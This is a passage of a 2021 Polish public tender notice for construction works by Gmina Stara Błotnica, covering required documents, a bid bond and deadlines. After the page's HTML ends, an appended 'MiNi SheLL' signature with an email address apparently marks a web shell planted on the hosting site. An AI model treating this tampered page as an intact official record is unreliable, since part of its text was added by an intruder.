robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 5 do SWZ. 3)	Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych/uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ 4) kosztorys ofertowy oraz harmonogram wykonania robót budowlanych. Dokumenty te stanowić będą załączniki do umowy. Kosztorys powinien być opracowany metodą kalkulacji szczegółowej (wydruk w wersji uproszczonej z załączonymi zestawieniami materiałów, robocizny i sprzętu, zawierający na stronie tytułowej stawkę R-g oraz narzuty Kp (do R i S) i Zysk do (R, S i Kp)). Wyliczona tym kosztorysem cena musi być zgodna z ceną oferty stanowiącej podstawę zawarcia Umowy. W razie uwag Zamawiającego do kosztorysu – w szczególności w przypadku niezgodności tych dokumentów z ofertą i SIWZ, Wykonawca zobowiązany jest do dokonania poprawy i przekazania poprawionego dokumentu Zamawiającemu w terminie 5 dni roboczych licząc od dnia otrzymania uwag.6.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w ust. 6 pkt 1), składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - w zakresie określonym w art. 109 ust. 1 pkt 4 ustawy Pzp. Dokument powinien być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: Dla każdej części : 8 000 zł 2.	Wadium może być wniesione w jednej lub kilku następujących formach: 1)	pieniądzu; 2)	gwarancjach bankowych; 3)	gwarancjach ubezpieczeniowych; 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2020 r. poz. 299 ze zm. ). Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego tj.:Bank Spółdzielczy Rzemiosła w Radomiu O/Stara Błotnica Nr rachunku: 94 9115 0002 0050 0500 02150003 wpisując w tytuł przelewu nazwę zadania na jakie jest wnoszone.UWAGA: Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert. 3.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania: 1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP. 2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium; 3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; 4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); 5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; 6) beneficjentem poręczenia lub gwarancji jest: Gmina Stara Błotnica;4. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Ustawy PZP zostanie odrzucona ;5.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Ustawy PZP . <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> są już znane. 14.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku: a)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. b)	Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w okolicznościach w projekcie umowy stanowiącej załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Komunikacja miedzy Zamawiającym a Wykonawcą odbywa się przy użyciu miniPortalu który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu dostępnego pod adresem: /5y8g1I1scq/skrytka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-26 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-25</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com